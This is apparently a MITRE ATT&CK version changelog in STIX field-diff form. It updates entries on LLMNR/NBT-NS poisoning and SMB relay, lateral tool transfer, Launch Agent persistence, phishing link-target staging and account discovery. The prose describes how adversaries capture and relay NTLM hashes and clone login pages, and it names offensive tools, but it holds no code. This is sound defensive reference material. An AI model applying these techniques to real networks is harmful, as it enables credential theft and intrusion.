external_references[2]['source_name']External to DA, the OS X WayKeychain Services Apple
external_references[2]['description']Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
external_references[2]['url']http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-wayhttps://developer.apple.com/documentation/security/keychain_services
x_mitre_data_sources[0]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[1]Process: OS API ExecutionCommand: Command Execution
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Empire Keychain Decrypt', 'description': 'Empire. (2018, March 8). Empire keychaindump_decrypt Module. Retrieved April 14, 2022.', 'url': 'https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py'}
external_references{'source_name': 'OSX Keychain Schaumann', 'description': 'Jan Schaumann. (2015, November 5). Using the OS X Keychain to store and retrieve passwords. Retrieved March 31, 2022.', 'url': 'https://www.netmeister.org/blog/keychain-passwords.html'}
external_references{'source_name': 'Keychain Decryption Passware', 'description': 'Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption. Retrieved April 13, 2022.', 'url': 'https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption'}
x_mitre_data_sourcesProcess: OS API Execution

[T1557.001] Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1By responding to LLMNR/NBT-NS network traffic, adversaries mt1By responding to LLMNR/NBT-NS network traffic, adversaries m
>ay spoof an authoritative source for name resolution to forc>ay spoof an authoritative source for name resolution to forc
>e communication with an adversary controlled system. This ac>e communication with an adversary controlled system. This ac
>tivity may be used to collect or relay authentication materi>tivity may be used to collect or relay authentication materi
>als.   Link-Local Multicast Name Resolution (LLMNR) and NetB>als.   Link-Local Multicast Name Resolution (LLMNR) and NetB
>IOS Name Service (NBT-NS) are Microsoft Windows components t>IOS Name Service (NBT-NS) are Microsoft Windows components t
>hat serve as alternate methods of host identification. LLMNR>hat serve as alternate methods of host identification. LLMNR
> is based upon the Domain Name System (DNS) format and allow> is based upon the Domain Name System (DNS) format and allow
>s hosts on the same local link to perform name resolution fo>s hosts on the same local link to perform name resolution fo
>r other hosts. NBT-NS identifies systems on a local network >r other hosts. NBT-NS identifies systems on a local network 
>by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation>by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation:
>: TechNet NetBIOS)  Adversaries can spoof an authoritative s> TechNet NetBIOS)  Adversaries can spoof an authoritative so
>ource for name resolution on a victim network by responding >urce for name resolution on a victim network by responding t
>to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know>o LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know 
> the identity of the requested host, effectively poisoning t>the identity of the requested host, effectively poisoning th
>he service so that the victims will communicate with the adv>e service so that the victims will communicate with the adve
>ersary controlled system. If the requested host belongs to a>rsary controlled system. If the requested host belongs to a 
> resource that requires identification/authentication, the u>resource that requires identification/authentication, the us
>sername and NTLMv2 hash will then be sent to the adversary c>ername and NTLMv2 hash will then be sent to the adversary co
>ontrolled system. The adversary can then collect the hash in>ntrolled system. The adversary can then collect the hash inf
>formation sent over the wire through tools that monitor the >ormation sent over the wire through tools that monitor the p
>ports for traffic or through [Network Sniffing](https://atta>orts for traffic or through [Network Sniffing](https://attac
>ck.mitre.org/techniques/T1040) and crack the hashes offline >k.mitre.org/techniques/T1040) and crack the hashes offline t
>through [Brute Force](https://attack.mitre.org/techniques/T1>hrough [Brute Force](https://attack.mitre.org/techniques/T11
>110) to obtain the plaintext passwords. In some cases where >10) to obtain the plaintext passwords.  In some cases where 
>an adversary has access to a system that is in the authentic>an adversary has access to a system that is in the authentic
>ation path between systems or when automated scans that use >ation path between systems or when automated scans that use 
>credentials attempt to authenticate to an adversary controll>credentials attempt to authenticate to an adversary controll
>ed system, the NTLMv2 hashes can be intercepted and relayed >ed system, the NTLMv2 hashes can be intercepted and relayed 
>to access and execute code against a target system. The rela>to access and execute code against a target system. The rela
>y step can happen in conjunction with poisoning but may also>y step can happen in conjunction with poisoning but may also
> be independent of it. (Citation: byt3bl33d3r NTLM Relaying)> be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(
>(Citation: Secure Ideas SMB Relay)  Several tools exist that>Citation: Secure Ideas SMB Relay) Additionally, adversaries 
> can be used to poison name services within local networks s>may encapsulate the NTLMv1/v2 hashes into various protocols,
>uch as NBNSpoof, Metasploit, and [Responder](https://attack.> such as LDAP, SMB, MSSQL and HTTP, to expand and use multip
>mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Cita>le services with the valid NTLM response.   Several tools ma
>tion: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)>y be used to poison name services within local networks such
 > as NBNSpoof, Metasploit, and [Responder](https://attack.mit
 >re.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation:
 > Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-09-28 13:09:50.809000+00:002022-10-18 20:13:48.423000+00:00
descriptionBy responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS) Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS) Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.  Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)
external_references[1]['source_name']Wikipedia LLMNRRapid7 LLMNR Spoofer
external_references[1]['description']Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.
external_references[1]['url']https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolutionhttps://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response
external_references[2]['source_name']TechNet NetBIOSGitHub Responder
external_references[2]['description']Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.
external_references[2]['url']https://technet.microsoft.com/library/cc958811.aspxhttps://github.com/SpiderLabs/Responder
external_references[3]['source_name']byt3bl33d3r NTLM RelayingSecure Ideas SMB Relay
external_references[3]['description']Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019.Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019.
external_references[3]['url']https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.htmlhttps://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html
external_references[4]['source_name']Secure Ideas SMB RelayTechNet NetBIOS
external_references[4]['description']Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019.Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.
external_references[4]['url']https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.htmlhttps://technet.microsoft.com/library/cc958811.aspx
external_references[6]['source_name']Rapid7 LLMNR SpooferGitHub Conveigh
external_references[6]['description']Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017.
external_references[6]['url']https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_responsehttps://github.com/Kevin-Robertson/Conveigh
external_references[7]['source_name']GitHub Responderbyt3bl33d3r NTLM Relaying
external_references[7]['description']Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019.
external_references[7]['url']https://github.com/SpiderLabs/Responderhttps://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
external_references[9]['source_name']GitHub ConveighWikipedia LLMNR
external_references[9]['description']Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017.Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.
external_references[9]['url']https://github.com/Kevin-Robertson/Conveighhttps://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentService: Service Creation
x_mitre_data_sources[1]Network Traffic: Network Traffic FlowWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[2]Service: Service CreationNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[3]Windows Registry: Windows Registry Key ModificationNetwork Traffic: Network Traffic Content
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsAndrew Allen, @whitehat_zero

[T1570] Lateral Tool Transfer

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may transfer tools or other files between systemt1Adversaries may transfer tools or other files between system
>s in a compromised environment. Files may be copied from one>s in a compromised environment. Once brought into the victim
> system to another to stage adversary tools or other files o> environment (i.e. [Ingress Tool Transfer](https://attack.mi
>ver the course of an operation. Adversaries may copy files l>tre.org/techniques/T1105)) files may then be copied from one
>aterally between internal victim systems to support lateral > system to another to stage adversary tools or other files o
>movement using inherent file sharing protocols such as file >ver the course of an operation. Adversaries may copy files b
>sharing over SMB to connected network shares or with authent>etween internal victim systems to support lateral movement u
>icated connections with [SMB/Windows Admin Shares](https://a>sing inherent file sharing protocols such as file sharing ov
>ttack.mitre.org/techniques/T1021/002) or [Remote Desktop Pro>er [SMB/Windows Admin Shares](https://attack.mitre.org/techn
>tocol](https://attack.mitre.org/techniques/T1021/001). Files>iques/T1021/002) to connected network shares or with authent
> can also be copied over on Mac and Linux with native tools >icated connections via [Remote Desktop Protocol](https://att
>like scp, rsync, and sftp.>ack.mitre.org/techniques/T1021/001).(Citation: Unit42 Locker
 >Goga 2019)  Files can also be transferred using native or ot
 >herwise present tools on the victim system, such as scp, rsy
 >nc, curl, sftp, and [ftp](https://attack.mitre.org/software/
 >S0095).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-09-28 21:17:42.490000+00:002022-04-19 15:34:49.016000+00:00
descriptionAdversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019) Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095).
x_mitre_data_sources[1]Named Pipe: Named Pipe MetadataProcess: Process Creation
x_mitre_data_sources[5]Command: Command ExecutionNamed Pipe: Named Pipe Metadata
x_mitre_data_sources[6]Process: Process CreationFile: File Metadata
x_mitre_detectionMonitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.Monitor for file creation and files transferred within a network using protocols such as SMB or FTP. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Unit42 LockerGoga 2019', 'description': 'Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.', 'url': 'https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/'}
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Metadata

[T1543.001] Create or Modify System Process: Launch Agent

Current version: 1.4

Version changed from: 1.3 → 1.4

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Antonio Piazza, @antman1p']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-11-03 20:11:51.687000+00:002022-04-21 16:13:00.598000+00:00
external_references[2]['source_name']OSX Keydnap malwareSofacy Komplex Trojan
external_references[2]['description']Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
external_references[2]['url']https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
external_references[3]['source_name']Antiquated Mac MalwareOceanLotus for OS X
external_references[3]['description']Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.
external_references[3]['url']https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update
external_references[4]['source_name']OSX.Dok MalwareOSX Keydnap malware
external_references[4]['description']Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.
external_references[4]['url']https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
external_references[5]['source_name']Sofacy Komplex TrojanMethods of Mac Malware Persistence
external_references[5]['description']Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.
external_references[5]['url']https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
external_references[6]['source_name']Methods of Mac Malware PersistenceOSX Malware Detection
external_references[6]['description']Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.
external_references[6]['url']https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdfhttps://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
external_references[7]['source_name']OSX Malware DetectionAntiquated Mac Malware
external_references[7]['description']Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.
external_references[7]['url']https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdfhttps://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
external_references[8]['source_name']OceanLotus for OS XOSX.Dok Malware
external_references[8]['description']Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.
external_references[8]['url']https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-updatehttps://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/
x_mitre_data_sources[2]File: File ModificationService: Service Modification
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesService: Service Modification

[T1608.005] Stage Capabilities: Link Target

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may put in place resources that are referenced bt1Adversaries may put in place resources that are referenced b
>y a link that can be used during targeting. An adversary may>y a link that can be used during targeting. An adversary may
> rely upon a user clicking a malicious link in order to divu> rely upon a user clicking a malicious link in order to divu
>lge information (including credentials) or to gain execution>lge information (including credentials) or to gain execution
>, as in [Malicious Link](https://attack.mitre.org/techniques>, as in [Malicious Link](https://attack.mitre.org/techniques
>/T1204/001). Links can be used for spearphishing, such as se>/T1204/001). Links can be used for spearphishing, such as se
>nding an email accompanied by social engineering text to coa>nding an email accompanied by social engineering text to coa
>x the user to actively click or copy and paste a URL into a >x the user to actively click or copy and paste a URL into a 
>browser. Prior to a phish for information (as in [Spearphish>browser. Prior to a phish for information (as in [Spearphish
>ing Link](https://attack.mitre.org/techniques/T1598/003)) or>ing Link](https://attack.mitre.org/techniques/T1598/003)) or
> a phish to gain initial access to a system (as in [Spearphi> a phish to gain initial access to a system (as in [Spearphi
>shing Link](https://attack.mitre.org/techniques/T1566/002)),>shing Link](https://attack.mitre.org/techniques/T1566/002)),
> an adversary must set up the resources for a link target fo> an adversary must set up the resources for a link target fo
>r the spearphishing link.   Typically, the resources for a l>r the spearphishing link.   Typically, the resources for a l
>ink target will be an HTML page that may include some client>ink target will be an HTML page that may include some client
>-side script such as [JavaScript](https://attack.mitre.org/t>-side script such as [JavaScript](https://attack.mitre.org/t
>echniques/T1059/007) to decide what content to serve to the >echniques/T1059/007) to decide what content to serve to the 
>user. Adversaries may clone legitimate sites to serve as the>user. Adversaries may clone legitimate sites to serve as the
> link target, this can include cloning of login pages of leg> link target, this can include cloning of login pages of leg
>itimate web services or organization login pages in an effor>itimate web services or organization login pages in an effor
>t to harvest credentials during [Spearphishing Link](https:/>t to harvest credentials during [Spearphishing Link](https:/
>/attack.mitre.org/techniques/T1598/003).(Citation: Malwareby>/attack.mitre.org/techniques/T1598/003).(Citation: Malwareby
>tes Silent Librarian October 2020)(Citation: Proofpoint TA40>tes Silent Librarian October 2020)(Citation: Proofpoint TA40
>7 September 2019) Adversaries may also [Upload Malware](http>7 September 2019) Adversaries may also [Upload Malware](http
>s://attack.mitre.org/techniques/T1608/001) and have the link>s://attack.mitre.org/techniques/T1608/001) and have the link
> target point to malware for download/execution by the user.> target point to malware for download/execution by the user.
>  Adversaries may purchase domains similar to legitimate dom>  Adversaries may purchase domains similar to legitimate dom
>ains (ex: homoglyphs, typosquatting, different top-level dom>ains (ex: homoglyphs, typosquatting, different top-level dom
>ain, etc.) during acquisition of infrastructure ([Domains](h>ain, etc.) during acquisition of infrastructure ([Domains](h
>ttps://attack.mitre.org/techniques/T1583/001)) to help facil>ttps://attack.mitre.org/techniques/T1583/001)) to help facil
>itate [Malicious Link](https://attack.mitre.org/techniques/T>itate [Malicious Link](https://attack.mitre.org/techniques/T
>1204/001). Link shortening services can also be employed.>1204/001). Link shortening services can also be employed. Ad
 >versaries may also use free or paid accounts on Platform-as-
 >a-Service providers to host link targets while taking advant
 >age of the widely trusted domains of those providers to avoi
 >d being blocked.(Citation: Netskope GCP Redirection)(Citatio
 >n: Netskope Cloud Phishing)(Citation: Intezer App Service Ph
 >ishing)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 16:28:41.565000+00:002022-10-20 20:15:57.855000+00:00
descriptionAdversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed.Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)
external_references[1]['source_name']Malwarebytes Silent Librarian October 2020Netskope GCP Redirection
external_references[1]['description']Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022.
external_references[1]['url']https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection
external_references[2]['source_name']Proofpoint TA407 September 2019Netskope Cloud Phishing
external_references[2]['description']Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022.
external_references[2]['url']https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarianhttps://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Malwarebytes Silent Librarian October 2020', 'description': 'Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.', 'url': 'https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/'}
external_references{'source_name': 'Intezer App Service Phishing', 'description': 'Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.', 'url': 'https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/'}
external_references{'source_name': 'Proofpoint TA407 September 2019', 'description': 'Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian'}

[T1087.001] Account Discovery: Local Account

Current version: 1.3

Version changed from: 1.2 → 1.3

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-07-28 18:05:24.567000+00:002022-08-25 13:04:39.404000+00:00
x_mitre_data_sources[0]Process: Process CreationGroup: Group Enumeration
